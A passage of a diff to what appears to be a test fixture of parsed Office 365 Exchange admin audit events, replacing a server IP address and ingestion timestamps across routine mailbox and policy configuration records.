bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7098,12 +7098,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7133,7 +7133,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -7145,8 +7145,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177831100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853449600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7166,12 +7166,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7203,7 +7203,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -7215,8 +7215,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177834400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853454200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7236,12 +7236,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7281,7 +7281,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -7293,8 +7293,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177837200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853460100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7314,12 +7314,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7362,7 +7362,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -7374,8 +7374,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177840100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853465900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7395,12 +7395,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7432,7 +7432,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -7444,8 +7444,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177843Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853471600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7465,12 +7465,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7513,7 +7513,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -7525,8 +7525,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177845700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853475500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7546,12 +7546,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7596,7 +7596,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -7608,8 +7608,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177850700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853480200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 